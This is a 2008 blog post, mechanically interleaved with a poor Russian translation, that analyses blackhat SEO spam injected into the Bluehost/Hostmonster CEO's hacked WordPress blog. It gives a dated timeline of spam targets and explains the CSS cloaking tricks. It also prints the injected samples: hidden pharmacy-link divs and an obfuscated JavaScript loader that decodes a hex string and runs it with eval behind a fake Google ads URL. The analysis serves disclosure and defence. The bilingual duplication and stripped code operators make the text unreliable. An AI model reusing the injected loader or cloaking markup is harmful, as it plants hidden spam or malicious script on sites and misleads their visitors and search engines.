Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II Мэтт Heaton Bluehost Hostmonster CEO Hacked снова - Strike II

    • Jan Январь
    • 31 31

    Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II Мэтт Heaton Bluehost Hostmonster CEO Hacked снова - Strike II

    Posted by chaoskaizer.myopenid.com 7 months ago . Написал chaoskaizer.myopenid.com 7 месяцев назад.

    Filed under Security ¸ WordPress & vulnerability . Filed Безопасности ¸ WordPress и уязвимости.

    wordpress-blackhat-seo-spam.png изображение chaoskaizer Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com . Быть Hacked по SEO спамер кажутся ежегодные мероприятия на Mattheaton.com. Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). Мэтт в WordPress блоге впервые был угнан 2 месяца назад, 26 ноября 2007 года (согласно моей записи). You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked . Вы можете digg мое предыдущее сообщение на → Matt Heaton BlueHost HostMonster CEO Официальный блог Hacked.

    It’sa big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) . Это большой неловкости за bluehost и hostmonster хостинг, чтобы их CEO Блог время spamride ежегодно (с 2007 г.). Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate. Бурение Matt Heaton's при плохой объявления обыкновение решает Blackhat Спам вопросы, я буду левой части сведения о том, что для моих читателей спекулировать.

    Mattheaton Goro Spam Chronology Mattheaton Горо спам хронология

    Date Дата Event Событие
    Jul 2007 Июль 2007 Google PR 7 Google PR 7
    Aug 2007 Август 2007 Stop being Index by archive.org Остановить время указатель на archive.org
    Nov 28th 2007 28 ноября 2007 года Wordpress.net.in Goro Spam on wp_footer backlink to howardowens.com Wordpress.net.in Горо Спам по wp_footer обратной ссылки на howardowens.com
    Dec 4th 2007 4 декабря 2007 года Unknown Goro Spam on wp_head backlink to tangonoticias.com Неизвестный Горо Спам по wp_head обратной ссылки на tangonoticias.com
    Dec 11th 2007 11 декабря 2007 года Wordpress Upgrade to version 2.3.1 Wordpress Обновление до версии 2.3.1
    Jan 16th, 2008 16 января 2008 года Google PR5 Google PR5
    Jan 26th, 2008 26 января 2008 года Unknown Blackhat SEO spam on wp_head backlink to brainwave-india.com Неизвестный Blackhat SEO спамом по wp_head обратной ссылки на brainwave-india.com
    Feb 3rd, 2008 3 февраля 2008 года Unknown Blackhat SEO spam on wp_head backlink to thinkingphp.org Неизвестный Blackhat SEO спамом по wp_head обратной ссылки на thinkingphp.org
    Feb 8th, 2008 8 февраля 2008 года Unknown uusing CSS cloacking method on wp_head backlink to zoorender.com Неизвестный uusing CSS cloacking метод wp_head обратной ссылки на zoorender.com
    Feb 13th, 2008 13 февраля 2008 года Unknown using CSS cloacking method on wp_head backlink to blog.jensfranke.com Неизвестно, используя CSS cloacking метод wp_head обратной ссылки на blog.jensfranke.com
    Feb 20th, 2008 20 февраля 2008 года Unknown using CSS cloacking method on wp_head backlink to entrepreneur27.org Неизвестно, используя CSS cloacking метод wp_head обратной ссылки на entrepreneur27.org
    Feb 24th, 2008 24 февраля 2008 года Unknown using CSS cloacking method on wp_head backlink to latenightpc.com Неизвестно, используя CSS cloacking метод wp_head обратной ссылки на latenightpc.com
    Feb 26th, 2008 26 февраля 2008 года Unknown using CSS cloacking method on wp_head backlink to communitynext.com Неизвестно, используя CSS cloacking метод wp_head обратной ссылки на communitynext.com

    Wordpress.net.in GORO Spam Pattern Wordpress.net.in Горо спам схеме

    • All the infected sites will stop being index by archive.org few months before the spam started. Все зараженные объекты будут перестать быть указатель по archive.org несколько месяцев до начала спам.
    • From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x) С ноября 2007 по январь 2008 года (сразу после Google Масс P3 Де ранга лихорадка) - The Blackhat Горо спамер ориентации PR6 и PR7-сайты, работающие на WordPress (2.3.1 ниже) и о некоторых редких случаях (tangonoticias.com) Joomla CMS ( 1.0.x)
    • I categorize this blackhat method as Sybil Attack Я классифицировать эту blackhat метод, как Сибил Attack

      A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. Сибил атака, в которой злоумышленник подрывает репутацию системы за счет создания большого количества pseudonymous образований, и их использование для получения непропорционально большое влияние. A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically. Репутация системы уязвимости перед Сибил атаки зависит от того, насколько дешево Sybils могут быть произведены, в какой степени репутацию система принимает материалы от подразделений, которые не имеют цепи доверия их увязки с доверять организации, и является ли система репутации обрабатывает все подразделения идентично.

      - Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) -- Derank и манипулировать их жертвой пребывания для увеличения их фармацевтической продукции на местный поиск Google Index (игра Localrank для лучшего SERP)

    • Goro signatures: Горо подписей:
      1. html div with id “goro” html div с идентификатором "Горо" 
         <div id="goro"> <a href=">...</a> </div> <div id="goro"> <a href="> ...</> </ div>
      2. javascript function name “getme()” javascript имя функции "getme ()" 
         <script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (  idx; idx < len; idx  = 2,i  ){ var ch = parseInt(str.substr(idx, 2), 16); new_str  = String.fromCharCode((ch   i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script> <script type="text/javascript"> функция getme (Ул) (var idx = str.indexOf ('?'); если (idx == -1) возвращение ул; var вр = str.length; var new_str = ' '; Var я = 1; для (    idx; idx <вр; idx   = 2, я    ) (var гл = parseInt (str.substr (idx, 2), 16); new_str   = String.fromCharCode (( гл   я)% 256);) eval (new_str);) getme ( 'http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </ скрипт>
      3. Output spam on WordPress wp_footer & wp_head hook Результат спам на WordPress wp_footer и wp_head крючком

    Blackhat SEO Spamdexing Google Local Search Index Blackhat SEO Spamdexing Google Local поискового индекса

    The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP. Ниже графике объяснить Blackhat SEO Spamdexing методы для манипулирования SERP Google Local.

    View Spamdexing Google Local Search Image Посмотреть Spamdexing локального поиска Google Image

    ScreenGrab

    Recent Update Последние обновления

    • Feb 1, 2008 - we send a letter to regarding this issue. 1 февраля 2008 года - мы отправляем письмо с по этому вопросу. Still waiting for his replies Но ждать его ответы
    • Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer . 3 февраля 2008 года - В Blackhat Горо Spammer изменения их целевого spamhost из http://www.brainwave-india.com (PR6) для http://www.thinkingphp.org (PR6) - Феликс Geisendörfer. 
       <div id="goro"><a href="http://www.thinkingphp.org/?read=796 ... prescription</a></div><script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (  idx; idx < len; idx  = 2,i  ){ var ch = parseInt(str.substr(idx, 2), 16); new_str  = String.fromCharCode((ch   i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script> <div id="goro"> <href = "http://www.thinkingphp.org/?read=796 ... рецепту </> </ div> <script type="text/javascript"> функции getme (Ул) (var idx = str.indexOf ('?'); если (idx == -1) возвращение ул; var вр = str.length; var new_str =''; я var = 1; для (    idx; idx <вр; idx   = 2, я    ) (var гл = parseInt (str.substr (idx, 2), 16); new_str   = String.fromCharCode ((  я ч)% 256);) eval ( new_str);) getme ( 'http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </ скрипт>

      thinkingphp.org blog is running on WordPress 2.3.2 . thinkingphp.org блог работает на WordPress 2.3.2. We send him email regarding the Goro Spam hijack . Мы отправляем ему сообщение по поводу Горо блокировать спам.

    • Feb 8th 2008 , There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6) . 8 февраля 2008 года, Существует нет подписи Горо спам (тег с идентификатором Горо) по Matt Блог blackhat в настоящее время с помощью CSS Должность Встроенные помещения, чтобы скрыть спамов ссылки ↓ переадресацию на zoorender.com (PR6). 
       <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.zoorender.com/?discount=1776">buying .. <div style="left: -2227px; position: absolute; top: -3337px"> <a href="http://www.zoorender.com/?discount=1776"> покупать .. </div> </ div>
    • Feb 13th 2008 , Same methods as above (inline css cloacking) . 13 февраля 2008 года, же методы, что и выше (встроенный css cloacking).
      • HTML Code shown to a Regular Browser → 32,246 characters HTML код, показанный на регулярные Browser → 32246 символов
      • HTML Code shown to Google Bot → 34,646 characters HTML код, показанный на Google Bot → 34646 символов

      redirect to blog.jensfranke.com (PR7) . переадресацию на blog.jensfranke.com (PR7). 

       <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://blog.jensfranke.com/?read=606">buy generic fi <div style="left: -2227px; position: absolute; top: -3337px"> <a href="http://blog.jensfranke.com/?read=606"> купить общего фи
    • Feb 20th 2008 , CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6) . 20 февраля 2008 года, CSS Cloacking переадресацию на http://www.entrepreneur27.org/ (PR6). 
       <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.entrepreneur27.org/?more=1591">bad side effects of viagra</a>&nbsp;<a href="http://www.entrepreneur27.org/?more=1592"> ... <div style="left: -2227px; position: absolute; top: -3337px"> <a href="http://www.entrepreneur27.org/?more=1591"> плохих побочных эффектов viagra </> <a href="http://www.entrepreneur27.org/?more=1592"> ... </div> </ div>
    • Feb 24th 2008 , CSS Cloacking redirect to http://www.latenightpc.com (PR5) . mattheaton-com-022408-source.txt 24 февраля 2008 года, CSS Cloacking переадресацию на http://www.latenightpc.com (PR5). Mattheaton-ком-022408-source.txt
    • Feb 26th 2008 , CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6) . mattheaton-com-022608-source.txt 26 февраля 2008 года, CSS Cloacking переадресацию на http://www.communitynext.com/ WordPress 2.3.3 (PR6). Mattheaton-ком-022608-source.txt

    Related Posts Похожие Сообщений

    External Links Внешние ссылки

    About the Author Об авторе

     

    Tags: Метки:
    • January 31, 2008 at 5:07 pm 31 января 2008 года в 5:07 вечера
    • March 4, 2008 at 5:42 pm 4 марта 2008 года в 5:42 вечера
    • 0.3 0,3
    • url

    • One Response toMatt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II Один из ответов на "Matt Heaton Bluehost Hostmonster ЦОО Hacked снова - удар II"

      Trackback URL: Trackback URL: Use the TrackBack url ↑ to ping this article. Используйте TrackBack url ↑ пинговать эту статью. If your blog does not support Trackbacks you might want to leave a comment instead. Если Ваш блог не поддерживает Trackbacks Вы можете оставить комментарий, вместо.
        • permalink Постоянная
          Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II staygolinks.com 6 months, 3 weeks ago 3 url Мэтт Heaton Bluehost Hostmonster CEO Hacked Опять же - Strike II staygolinks.com 6 месяцев, 3 недели назад, 3 url

          [...] on that is the blog of Matt Heaton, the Bluehost and Hostmonster CEO. [...] О том, что это в блоге Мэтт Heaton, Bluehost и Hostmonster главного исполнительного директора. The Kakkoi website provides a good account of what has been happening there. Kakkoi веб-сайт предоставляет хорошую во внимание то, что происходит там. At the time of writing this post, the blog is still hacked although you would not know by looking [...] На момент написания этого поста, блог остается взломанный, хотя вы не знаете, посмотрев [...]

          • 1 pingback(s) þ www.staygolinks.com on WordPress 2.3.3 1 pingback (ов) þ www.staygolinks.com на WordPress 2.3.3

    RSS feed for comments in this post RSS канал для комментариев на этот пост

    "write as if you were talking to a good friend (in front of your mother)." "писать, как если бы вы разговаривали с хорошим другом (в передней части вашей матери)."

    .have your say . Ваш сказать

    Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved. Disclaimer: Для любого содержания, которое вы разместите, Вы тем самым предоставляете Kakkoi безгонорарные, окончательное, вечное, эксклюзивные и сублицензируемое на использование, воспроизведение, модификацию, адаптацию, публикацию, перевод, создавать производные работы, распространять, исполнять или показывать такие материалы, полностью или частично, во всем мире и включение его в другие произведения в любой форме, в средствах массовой информации или технологии, известной сейчас или позже разработаны. Некоторые права защищены.

MySQL query error MySQL запрос об ошибке